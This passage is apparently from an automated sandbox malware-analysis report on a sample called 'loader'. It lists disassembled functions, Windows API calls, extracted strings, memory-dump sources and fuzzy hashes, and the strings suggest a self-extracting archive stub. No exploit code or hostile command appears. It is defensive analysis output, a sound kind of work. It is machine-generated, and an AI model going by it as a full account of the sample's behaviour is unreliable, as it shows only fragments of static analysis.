              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              • Opcode ID: bcc645c6b60f74aaaaeb0033937006b1ee332dbb8a472da6750c0d17ac062d99
              • Instruction ID: e1a57ce2f07e9aed30fc2590c850c124a4c97d3391be9d605bededee6dabc9b1
              • Opcode Fuzzy Hash: bcc645c6b60f74aaaaeb0033937006b1ee332dbb8a472da6750c0d17ac062d99
              • Instruction Fuzzy Hash: 26F105716042405BDB25EF248899BFA779A6FA4300F08457DF9C58B2C2DBF59848CBA2
              Function 0012EE2D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
              Download Yara Rule
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0012F5A2,?,00000000,?,00000000,00000000), ref: 0012EE6F
              • __fassign.LIBCMT ref: 0012EEEA
              • __fassign.LIBCMT ref: 0012EF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0012EF2B
              • WriteFile.KERNEL32(?,?,00000000,0012F5A2,00000000,?,?,?,?,?,?,?,?,?,0012F5A2,?), ref: 0012EF4A
              • WriteFile.KERNEL32(?,?,00000001,0012F5A2,00000000,?,?,?,?,?,?,?,?,?,0012F5A2,?), ref: 0012EF83
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID: ^PpL
              • API String ID: 1324828854-914357616
              • Opcode ID: 9fde626fb4bf55f49094df258839d62439bcc9fe30b78438898a4bf6634aff22
              • Instruction ID: efecb5698f5bc57687e251b7bd99201ab1e555dc1064d6359d17c93c5ac5ef15
              • Opcode Fuzzy Hash: 9fde626fb4bf55f49094df258839d62439bcc9fe30b78438898a4bf6634aff22
              • Instruction Fuzzy Hash: B451E671E00219AFCB14CFA8ED45AEEBBF9EF09310F24451AE955E7291D77099A0CB60
              Function 0011ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0011AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0011AD60
              • SetWindowTextW.USER32(?,?), ref: 0011AD71
              • GetDlgItem.USER32(?,00000065), ref: 0011AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0011AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0011ADA4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              • Opcode ID: 64cd5001ca3d998dbd5f6d8b02a133906b719ea946f1839e2f8cc4a3fcadcf8b
              • Instruction ID: fab1df36ab06c2366930dec4109844734009727053ccebba21a34652b80ee685
              • Opcode Fuzzy Hash: 64cd5001ca3d998dbd5f6d8b02a133906b719ea946f1839e2f8cc4a3fcadcf8b
              • Instruction Fuzzy Hash: FF21F631245614BBD6295FA5FC49EBB3F6CEF06B46F010024F604E6CA0CBA2A9C0D632
              Function 00109443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00109448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0010946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0010948A
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              • _swprintf.LIBCMT ref: 00109526
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • MoveFileW.KERNEL32(?,?), ref: 00109595
              • MoveFileW.KERNEL32(?,?), ref: 001095D5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              • Opcode ID: 486c37a9896bc3ce1e2cb7c1dcc9341db5ad9904fb6a746a0948dec172847173
              • Instruction ID: 7032147bb70e37d00ae5801f3765cdb929b6e5f96ca72e053d12bfdd300284e6
              • Opcode Fuzzy Hash: 486c37a9896bc3ce1e2cb7c1dcc9341db5ad9904fb6a746a0948dec172847173
              • Instruction Fuzzy Hash: 4041427190025866DF20EBA08C95ADB737CAF65380F0444E5B599E3092EBB48BC9CB64
              Function 00118E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
              Download Yara Rule
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00118F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00118F59
              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00118F80
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Global$AllocByteCharCreateMultiStreamWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 4094277203-4209811716
              • Opcode ID: 3f312da2b63574f09e1e13a33c69b689a31a4d022f25ec4564d46b905040dd02
              • Instruction ID: ff938462ef007ff0d7f7c6aa7e67416875cd27a31807136e11dcc91b8902ec94
              • Opcode Fuzzy Hash: 3f312da2b63574f09e1e13a33c69b689a31a4d022f25ec4564d46b905040dd02
              • Instruction Fuzzy Hash: C8315B315083127FD728BB34AC06FEF7759DF61760F104529F811961C1EF749A9983A5
              Function 00110A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
              Download Yara Rule
              APIs
              • __aulldiv.LIBCMT ref: 00110A9D
                • Part of subcall function 0010ACF5: GetVersionExW.KERNEL32(?), ref: 0010AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00110AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00110AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00110AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00110B3D
              • __aullrem.LIBCMT ref: 00110BCB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              • Opcode ID: 09de7e34ad907bd0cc57926a732ab1fe24a81edd9dfc795a6f7d9e8607293f56
              • Instruction ID: 6735d532b67301c1b720f329c05ada7f5e2a383b64c919cdb84a294d6e75be9c
              • Opcode Fuzzy Hash: 09de7e34ad907bd0cc57926a732ab1fe24a81edd9dfc795a6f7d9e8607293f56
              • Instruction Fuzzy Hash: DC413AB54083069FC314DF64C8809ABFBF8FF88715F004A2EF59692650E779E588CB56
              Function 0011C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
              Download Yara Rule
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 0011C54A
              • _swprintf.LIBCMT ref: 0011C57E
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • SetDlgItemTextW.USER32(?,00000066,0014946A), ref: 0011C59E
              • _wcschr.LIBVCRUNTIME ref: 0011C5D1
              • EndDialog.USER32(?,00000001), ref: 0011C6B2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: aae3f53ad97b3522f6acfaffaf43eb5f7a1b5dec33049dea415b614fbaad0f5c
              • Instruction ID: 3e0b406e3ff045928cd11b05b1205ff163f79b22f0c3ff5f392e18f16f9746ad
              • Opcode Fuzzy Hash: aae3f53ad97b3522f6acfaffaf43eb5f7a1b5dec33049dea415b614fbaad0f5c
              • Instruction Fuzzy Hash: 2B41C471940618EADB2ADBA0DC45EDA77BDEF18701F0040B6E509E70A0E7B59BC4CB90
              Function 00127DD9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free
              • String ID: ^PpL
              • API String ID: 269201875-914357616
              • Opcode ID: ad23bc343b00e156d3d545b1614e161db7cb2170cb17ca189bbd999db7ee6750
              • Instruction ID: 20b93af25fb520b4a239cb758df5147b31718c6528b5b1ffe9fcd1e7ff62c6a7
              • Opcode Fuzzy Hash: ad23bc343b00e156d3d545b1614e161db7cb2170cb17ca189bbd999db7ee6750
              • Instruction Fuzzy Hash: B441E432A043149FCB14DF78D881A9EB7F6EF85314F1645A8E915EB281DB30AD11CB80
              Function 00119635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              APIs
              • ShowWindow.USER32(?,00000000), ref: 0011964E
              • GetWindowRect.USER32(?,00000000), ref: 00119693
              • ShowWindow.USER32(?,00000005,00000000), ref: 0011972A
              • SetWindowTextW.USER32(?,00000000), ref: 00119732
              • ShowWindow.USER32(00000000,00000005), ref: 00119748
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: 25e097a42cf302d66f5a81926a0b3d760dec394323ed99aa092fa8512bf35fac
              • Instruction ID: cd64e7ed68b8b24cab2112aa77292c51691cf41992e89c25f38affda20338aa1
              • Opcode Fuzzy Hash: 25e097a42cf302d66f5a81926a0b3d760dec394323ed99aa092fa8512bf35fac
              • Instruction Fuzzy Hash: 5C310F31108310EFDB259F60DC4CBABBBA8EF09701F004569FE59AA1A2CB74D894CF61
              Function 0012BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 0012BF79: _free.LIBCMT ref: 0012BFA2
              • _free.LIBCMT ref: 0012C003
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 0012C00E
              • _free.LIBCMT ref: 0012C019
              • _free.LIBCMT ref: 0012C06D
              • _free.LIBCMT ref: 0012C078
              • _free.LIBCMT ref: 0012C083
              • _free.LIBCMT ref: 0012C08E
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction ID: 34fe3a3f17f81a3e0a097afc5a03264ef9059433ee6ee0395113acd7b9f4d007
              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction Fuzzy Hash: 1211B131545B28FAD730BBB0ED47FCBB79C6F18700F408854B799A6452CB24F8249B80
              Function 001220CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,001220C1,0011FB12), ref: 001220D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001220E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001220FF
              • SetLastError.KERNEL32(00000000,?,001220C1,0011FB12), ref: 00122151
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 0774c9a8d1d070e1df201f29a0bfd39f361c039924bd2f33996439ea0d7c0e22
              • Instruction ID: 77497d9f2b15f096efaffff82564c2e8c786d89381cd8e7ab6cc536f1da22eb0
              • Opcode Fuzzy Hash: 0774c9a8d1d070e1df201f29a0bfd39f361c039924bd2f33996439ea0d7c0e22
              • Instruction Fuzzy Hash: 3401F7722097317EF7682BB57C86B2E6F88FB21770B210629F720554E0EF654D719144
              Function 0011DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: f946826efb48d6ff69e6c471f79041db36cf05086b047e91ff7d2b95d2e82e05
              • Instruction ID: ee31b1231fdfd5b8f30a3f5b0d334b9a197a9acf32d7a856d67e03b27bc4a43c
              • Opcode Fuzzy Hash: f946826efb48d6ff69e6c471f79041db36cf05086b047e91ff7d2b95d2e82e05
              • Instruction Fuzzy Hash: AE0128727413225BCF2D5FB47C817E727D4AB45752320097EE501D7280EB91C8C1D6E0
              Function 001275C2 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00127573,00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002), ref: 001275E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001275F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00127573,00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002), ref: 00127618
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$^PpL$mscoree.dll
              • API String ID: 4061214504-1742151727
              • Opcode ID: ec3f17eb3e439265afdd85db07660c3e1fa2fed4666d01e87b955d9899adf8c6
              • Instruction ID: 70f174ac8c2bf86410ab108e12c7616f6a1df99e5db731596de1a89b40858e84
              • Opcode Fuzzy Hash: ec3f17eb3e439265afdd85db07660c3e1fa2fed4666d01e87b955d9899adf8c6
              • Instruction Fuzzy Hash: B7F06230A1861CBBDB159FA4EC09BDEBFB9EF04721F004168F805A6190DF708E94DB94
              Function 00110CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
              Download Yara Rule
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110D0D
                • Part of subcall function 0010ACF5: GetVersionExW.KERNEL32(?), ref: 0010AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00110CB8), ref: 00110D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00110D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00110D56
              • SystemTimeToFileTime.KERNEL32(?,00110CB8), ref: 00110D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110D72
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: 6f5660e5015d1857895874c5a89693abd21b62d78fbf6e271ba33171077af7af
              • Instruction ID: 427179538bb9fbef86fa318e5d27598bed72690e965fba6c234cc9c3a3431a8a
              • Opcode Fuzzy Hash: 6f5660e5015d1857895874c5a89693abd21b62d78fbf6e271ba33171077af7af
              • Instruction Fuzzy Hash: EE31E97A900209EBCB04DFE4D8859EFFBBCFF58700B04456AE955E3610E7309685CB68
              Function 001191B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 2ec5cc5f63dd1cdf2cdd0c5f738421a739d71f73e4fd75ff5cc9c7ed2f9c7f45
              • Instruction ID: ff90ffd66e7aa89f7296b40a6691e45d50e8509bb4f1ab23b5c21abf6c751ead
              • Opcode Fuzzy Hash: 2ec5cc5f63dd1cdf2cdd0c5f738421a739d71f73e4fd75ff5cc9c7ed2f9c7f45
